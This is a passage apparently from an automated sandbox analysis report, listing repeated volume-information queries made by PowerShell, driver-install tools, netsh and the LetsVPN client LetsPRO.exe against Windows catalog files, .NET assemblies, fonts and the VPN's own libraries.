                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeQueries volume information: C:\Program Files (x86)\letsvpn\driver\tap0901.cat VolumeInformation
                Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.cat VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Utils.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\log4net.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNDomainModel.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Newtonsoft.Json.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Utils.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\log4net.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNDomainModel.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Newtonsoft.Json.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\CommunityToolkit.Mvvm.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Memory.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Buffers.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNInfraStructure.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Analytics.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Crashes.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.batteries_v2.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.core.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.provider.dynamic_cdecl.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.nativelibrary.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\Hardcodet.Wpf.TaskbarNotification.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\PusherClient.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\WebSocket4Net.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SuperSocket.ClientEngine.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Http.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLite-net.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
